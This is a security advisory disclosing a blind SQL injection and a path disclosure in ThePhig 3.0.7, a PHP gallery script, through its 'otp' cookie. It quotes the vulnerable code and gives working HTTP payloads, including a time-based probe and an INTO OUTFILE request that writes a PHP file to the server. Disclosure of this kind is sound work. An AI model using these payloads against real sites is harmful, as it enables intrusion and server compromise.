ThePhig 3.0.7 Multiple Remote Vulnerabilities

 Name              ThePhig
 Vendor            http://www.thephig.com
 Versions Affected 3.0.7

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-23-06

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION

ThePhig  is an OpenSource  php script  created  around the
basis that creating  an  album of images should be as easy
as uploading a directory of images.


II. DESCRIPTION

A not properly sanitised field is the cause of the follows
SQL Injection vulnerability.


III. ANALYSIS

Summary:

 A) Blind SQL Injection
 B) Full Path Disclosure
 

A) Blind SQL Injection

Using  a  crafted HTTP Cookie field, is possible to inject
arbitrary SQL statements in a SELECT query.
Because of the type, the injection may be used to write an
arbitrary file in the upload directories.

protect.php:

	require_once('includes.php');

	$login = mysql_query("SELECT sha1(lastlogin) FROM thephig_users WHERE sha1(lastlogin)='$otp'");
	
includes.php:

    $otp = $_COOKIE['otp'];
    
    
B) Full Path Disclosure

Exploiting the same security flaw, is possible to know the
full path of the vulnerable script.

if ( !mysql_num_rows($login) ) {


IV. SAMPLE CODE

A) Blind SQL Injection

GET /path/inc/protect.php HTTP/1.1
Host: targethost
Cookie: otp=-1' OR IF(ASCII(0x41)=65,BENCHMARK(999999999,NULL),NULL)#

Try to write a file:

GET /path/inc/protect.php HTTP/1.1
Host: targethost
Cookie: otp=-1' UNION SELECT 0x00 INTO OUTFILE '/path/evil.php


B) Full Path Disclosure

GET /path/inc/protect.php HTTP/1.1
Host: targethost
Cookie: otp=-1'


V. FIX

No Fix.